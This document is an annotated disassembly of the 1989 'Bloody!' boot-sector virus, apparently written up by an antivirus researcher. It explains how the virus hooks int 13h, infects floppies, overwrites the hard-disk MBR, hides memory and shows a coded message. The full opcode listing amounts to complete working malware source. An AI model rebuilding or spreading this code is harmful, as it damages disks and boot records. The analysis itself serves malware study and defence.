Bloody

; Bloody! virus -- discovered and commented by Ferenc Leitold, Hungarian VirusBuster team.
; Address: 1399 Budapest, P.O. Box 701/349, Hungary.
; Annotated DEBUG-style dead listing (16-bit real-mode x86, Intel syntax) of the 512-byte sector.

;----------------------------------------------------------------------
; Layout note: the sector was loaded in DEBUG at 217d:0100, so listing
; offset 01xx = sector offset 00xx. At boot the BIOS places the sector at
; 0000:7c00 (sector offset 0008 is then addressed as 7c08); the virus
; later copies itself to the top of conventional memory, shown as "top:".
; Column order: address, opcode bytes, mnemonic, operands, comment.
;----------------------------------------------------------------------
217d:0100  2eff2e177c   jmp   far cs:[7c17]   ; jump to main entry point through the far
                                              ;   pointer at 0117 (0000:7c05): forces CS:IP
                                              ;   to 0000:7cxx whatever the BIOS used
217d:0105  e9b500       jmp   01bd            ; -> main entry point
217d:0108  00           db    0               ; counter: boots from an infected hard disk
217d:0109  00           db    0               ; not referenced by the code
217d:010a  00           db    0               ; flag: 00 = floppy, nonzero (01 written at 029e) = hard disk
217d:010b  00           db    0               ; original int13 vector (4 bytes 010b-010e, filled
217d:010c  a100f0       mov   ax,[f000]       ;   at 01c8-01d1; the sample's f000:a100 is shown
                                              ;   by DEBUG as a meaningless mov)
217d:010f  0301809f     dw    0103h,9f80h     ; entry point at top: far ptr, segment stored at 01e0
217d:0113  007c0000     dw    7c00h,0000h     ; address of orig. boot sector, used by jmp far [0013]
217d:0117  057c0000     dw    7c05h,0000h     ; target of the far jump at 0100
217d:011b  00000000     dw    0000h,0000h     ; unused

;************************ int13 entry point *****************************
; Installed as the int 13h vector (top:001f). Only AH=02h/03h (read/write
; sectors) on drives DL<80h (floppies) pass through the infector at 0136;
; everything else, and the caller's own request afterwards, is chained to
; the saved BIOS vector at [000b] with the caller's registers intact.
217d:011f  80fc02       cmp   ah,02           ; check parameters
217d:0122  720d         jc    0131            ; AH<2: pass through
217d:0124  80fc04       cmp   ah,04
217d:0127  7308         jnc   0131            ; AH>=4: pass through
217d:0129  80fa80       cmp   dl,80
217d:012c  7303         jnc   0131            ; DL>=80h (hard disk): pass through
217d:012e  e80500       call  0136            ; call, if ah=2,3 & dl<80h
217d:0131  2eff2e0b00   jmp   far cs:[000b]   ; jump to original int13

; Floppy infector. Issues its own disk I/O with pushf + call far [000b]
; (equivalent to an int through the original vector, bypassing this hook).
217d:0136  50           push  ax              ; save registers
217d:0137  53           push  bx
217d:0138  51           push  cx
217d:0139  52           push  dx
217d:013a  06           push  es
217d:013b  1e           push  ds
217d:013c  56           push  si
217d:013d  57           push  di
217d:013e  0e           push  cs
217d:013f  1f           pop   ds              ; set ds,es to cs
217d:0140  0e           push  cs
217d:0141  07           pop   es
217d:0142  be0200       mov   si,0002         ; 2 probes (read attempts)
217d:0145  33c0         xor   ax,ax           ; reset drive (AH=0, DL = caller's drive)
217d:0147  9c           pushf
217d:0148  ff1e0b00     call  far [000b]      ; call int13
217d:014c  b80102       mov   ax,0201         ; read boot sector of floppy (1 sector)
217d:014f  bb0002       mov   bx,0200         ;   into top:0200
217d:0152  b90100       mov   cx,0001         ;   cyl 0, sect 1
217d:0155  32f6         xor   dh,dh           ;   head 0
217d:0157  9c           pushf
217d:0158  ff1e0b00     call  far [000b]      ; call int13
217d:015c  7305         jnc   0163
217d:015e  4e           dec   si              ; if error next probe
217d:015f  75e4         jnz   0145
217d:0161  eb2e         jmp   0191            ; jump, if 2 bad probes: give up silently
217d:0163  33f6         xor   si,si           ; check boot sector, if infected yet:
217d:0165  bf0002       mov   di,0200         ;   compare the first 3 words of own image
217d:0168  b90300       mov   cx,0003         ;   (2e ff 2e 17 7c e9) with the sector read --
217d:016b  fc           cld                   ;   a 6-byte signature is the only check
217d:016c  f3a7         rep   cmpsw
217d:016e  7421         jz    0191            ; jump, if already infected
217d:0170  b80103       mov   ax,0301         ; write orig. boot sector
217d:0173  bb0002       mov   bx,0200
217d:0176  b90300       mov   cx,0003         ; cyl: 0 sect: 3
217d:0179  b601         mov   dh,01           ; head: 1 -- overwritten without checking what the
                                              ;   sector holds (on common formats this is in the
                                              ;   FAT/root-directory area; verify against the media)
217d:017b  9c           pushf
217d:017c  ff1e0b00     call  far [000b]      ; call int13
217d:0180  720f         jc    0191            ; write failed: leave the floppy alone
217d:0182  b80103       mov   ax,0301         ; write infected boot sector (own image, top:0000)
217d:0185  33db         xor   bx,bx
217d:0187  b90100       mov   cx,0001         ; cyl:0 sect:1
217d:018a  32f6         xor   dh,dh           ; head: 0
217d:018c  9c           pushf
217d:018d  ff1e0b00     call  far [000b]      ; call int13 (result not checked)
217d:0191  5f           pop   di              ; restore registers
217d:0192  5e           pop   si
217d:0193  1f           pop   ds
217d:0194  07           pop   es
217d:0195  5a           pop   dx
217d:0196  59           pop   cx
217d:0197  5b           pop   bx
217d:0198  58           pop   ax
217d:0199  c3           ret

217d:019a  1d1d1d1a3737 db    ...             ; coded text, 00-terminated, each byte XOR 17h
217d:01a0  37373737557b                       ;   ([0003] = first byte of the far-jump operand
217d:01a6  7878736e3637                       ;   at 0100). Decoded:
217d:01ac  5d6279393723                       ;   "\n\n\n\r      Bloody! Jun. 4, 1989\n\n\n\r"
217d:01b2  3b37262e2f2e
217d:01b8  1d1d1d1a00

;************************** main entry point *******************************
; Reached at 0000:7cbd on boot. Saves and hooks int 13h, hides 2 KB of
; conventional memory, copies the whole sector there and continues at top:0103.
217d:01bd  33c0         xor   ax,ax
217d:01bf  8ed8         mov   ds,ax
217d:01c1  fa           cli
217d:01c2  8ed0         mov   ss,ax
217d:01c4  bc007c       mov   sp,7c00         ; stack just below the boot sector
217d:01c7  fb           sti
217d:01c8  a14c00       mov   ax,[004c]       ; save orig. int13 vector (0000:004c) into the
217d:01cb  a30b7c       mov   [7c0b],ax       ;   far pointer at sector offset 000b
217d:01ce  a14e00       mov   ax,[004e]
217d:01d1  a30d7c       mov   [7c0d],ax
217d:01d4  a11304       mov   ax,[0413]       ; decrease memory by 2kb: BIOS base-memory size
217d:01d7  48           dec   ax              ;   in KB at 0040:0013, so DOS never sees the
217d:01d8  48           dec   ax              ;   top 2 KB
217d:01d9  a31304       mov   [0413],ax
217d:01dc  b106         mov   cl,06           ; calculate segment: KB * 64 = paragraph address
217d:01de  d3e0         shl   ax,cl
217d:01e0  a3117c       mov   [7c11],ax       ;   segment half of the "top" far pointer at 010f
217d:01e3  a34e00       mov   [004e],ax       ; set new int13 vector = top:001f
217d:01e6  8ec0         mov   es,ax
217d:01e8  b81f00       mov   ax,001f
217d:01eb  a34c00       mov   [004c],ax
217d:01ee  c7060f7c0301 mov   [7c0f],0103     ; set jmp argument: offset of the continuation at top
217d:01f4  be007c       mov   si,7c00         ; copy itself to top (100h words = whole sector)
217d:01f7  33ff         xor   di,di
217d:01f9  b90001       mov   cx,0100
217d:01fc  fc           cld
217d:01fd  f3a5         rep   movsw
217d:01ff  ff2e0f7c     jmp   far [7c0f]      ; jmp to top:0103

; Continuation in the hidden memory block. Infects the hard-disk MBR when
; booted from a floppy, counts boots and shows the payload when booted from
; the hard disk, then chains to the original boot sector.
top:0203   33c0         xor   ax,ax           ; reset drive (AH=0)
top:0205   cd13         int   13
top:0207   0e           push  cs
top:0208   1f           pop   ds
top:0209   33c0         xor   ax,ax
top:020b   8ec0         mov   es,ax
top:020d   b80102       mov   ax,0201         ; set registers to load original sector
top:0210   bb007c       mov   bx,7c00         ;   to 0000:7c00
top:0213   803e0a0000   cmp   [000a],00       ; check, if it is floppy ?
top:0218   7435         jz    024f            ; jump, if floppy
top:021a   b90600       mov   cx,0006         ; if hard disk, load orig. part. table: cyl 0 sect 6
top:021d   ba8000       mov   dx,0080         ; head 0, drive 80h
top:0220   cd13         int   13              ; (error not checked)
top:0222   0e           push  cs
top:0223   07           pop   es
top:0224   fe060800     inc   b/[0008]        ; increase counter (byte at sector offset 0008)
top:0228   803e080080   cmp   [0008],80
top:022d   721e         jc    024d            ; if counter < 128 -> no text
top:022f   c60608007a   mov   [0008],7a       ; 7ah: text is shown again after 6 more boots
top:0234   fc           cld
top:0235   be9a00       mov   si,009a         ; write coded text via bios
top:0238   ac           lodsb
top:0239   3c00         cmp   al,00
top:023b   740c         jz    0249
top:023d   32060300     xor   al,[0003]       ; decode with 17h
top:0241   b40e         mov   ah,0e           ; teletype output
top:0243   b700         mov   bh,00
top:0245   cd10         int   10
top:0247   ebef         jmp   0238
top:0249   b400         mov   ah,00           ; wait for keystroke
top:024b   cd16         int   16
top:024d   eb54         jmp   02a3            ; write the MBR back with the new counter
top:024f   b90300       mov   cx,0003         ; if floppy: read orig. boot sector
top:0252   ba0001       mov   dx,0100         ; cyl: 0 hd: 1 sect: 3 (DL=0: drive A)
top:0255   cd13         int   13
top:0257   0e           push  cs
top:0258   07           pop   es
top:0259   721d         jc    0278            ; read error: still jumps to 0000:7c00 with
                                              ;   whatever the failed read left there
top:025b   b80102       mov   ax,0201         ; load part. table of 1st hard disk
top:025e   bb0002       mov   bx,0200         ;   into top:0200
top:0261   b90100       mov   cx,0001
top:0264   ba8000       mov   dx,0080
top:0267   cd13         int   13
top:0269   720d         jc    0278            ; jump, if error occured (e.g. no hard disk)
top:026b   be0002       mov   si,0200         ; check 1st 3 words: MBR already infected?
top:026e   33ff         xor   di,di
top:0270   b90300       mov   cx,0003
top:0273   fc           cld
top:0274   f3a7         rep   cmpsw
top:0276   750e         jnz   0286            ; not yet -> infect the MBR
top:0278   c6060a0000   mov   [000a],00       ; if infected yet: set flag to 0
top:027d   c606080000   mov   [0008],00       ; reset counter (resident copy only)
top:0282   ff2e1300     jmp   far [0013]      ; jump to orig. boot at 0000:7c00
top:0286   b80103       mov   ax,0301         ; write orig. part. table (whole MBR)
top:0289   bb0002       mov   bx,0200
top:028c   b90600       mov   cx,0006         ; cyl: 0 sect: 6 hd: 0
top:028f   cd13         int   13
top:0291   72e5         jc    0278            ; jump, if error occured
top:0293   bebe03       mov   si,03be         ; copy partition info
top:0296   bfbe01       mov   di,01be         ;   after virus body
top:0299   b92101       mov   cx,0121         ; 121h words (242h bytes) instead of the 42h bytes of
top:029c   f3a5         rep   movsw           ;   table + signature: the copy overruns 0400-05ff ->
                                              ;   0200-03ff, harmless only because that buffer is
                                              ;   not reused before the write below
top:029e   c6060a0001   mov   [000a],01       ; flag = hard disk
top:02a3   b80103       mov   ax,0301         ; write boot sector or partition table with
top:02a6   33db         xor   bx,bx           ;   increased counter: own image top:0000 to
top:02a8   b90100       mov   cx,0001         ;   cyl 0 hd 0 sect 1; DL=80h on both paths here
top:02ab   cd13         int   13
top:02ad   bebe04       mov   si,04be         ; clear area of partition info (copies 20h words
top:02b0   bfbe01       mov   di,01be         ;   from 04be, which the code assumes to be zero)
top:02b3   b92000       mov   cx,0020
top:02b6   f3a5         rep   movsw
top:02b8   ebbe         jmp   0278            ; set parameters & jump to orig. boot

top:02ba   de07         esc   30,[bx]         ; 02ba-02fd: unused bytes (de 07 df 07, then zeros);
top:02bc   df07         esc   38,[bx]         ;   DEBUG's esc/add decoding is meaningless
top:02be   0000         add   [bx+si],al
top:02c0   0000         add   [bx+si],al
top:02c2   0000         add   [bx+si],al
top:02c4   0000         add   [bx+si],al
top:02c6   0000         add   [bx+si],al
top:02c8   0000         add   [bx+si],al
top:02ca   0000         add   [bx+si],al
top:02cc   0000         add   [bx+si],al
top:02ce   0000         add   [bx+si],al
top:02d0   0000         add   [bx+si],al
top:02d2   0000         add   [bx+si],al
top:02d4   0000         add   [bx+si],al
top:02d6   0000         add   [bx+si],al
top:02d8   0000         add   [bx+si],al
top:02da   0000         add   [bx+si],al
top:02dc   0000         add   [bx+si],al
top:02de   0000         add   [bx+si],al
top:02e0   0000         add   [bx+si],al
top:02e2   0000         add   [bx+si],al
top:02e4   0000         add   [bx+si],al
top:02e6   0000         add   [bx+si],al
top:02e8   0000         add   [bx+si],al
top:02ea   0000         add   [bx+si],al
top:02ec   0000         add   [bx+si],al
top:02ee   0000         add   [bx+si],al
top:02f0   0000         add   [bx+si],al
top:02f2   0000         add   [bx+si],al
top:02f4   0000         add   [bx+si],al
top:02f6   0000         add   [bx+si],al
top:02f8   0000         add   [bx+si],al
top:02fa   0000         add   [bx+si],al
top:02fc   0000         add   [bx+si],al
top:02fe   55           push  bp              ; 55 aa: boot-sector signature, not code
top:02ff   aa           stosb
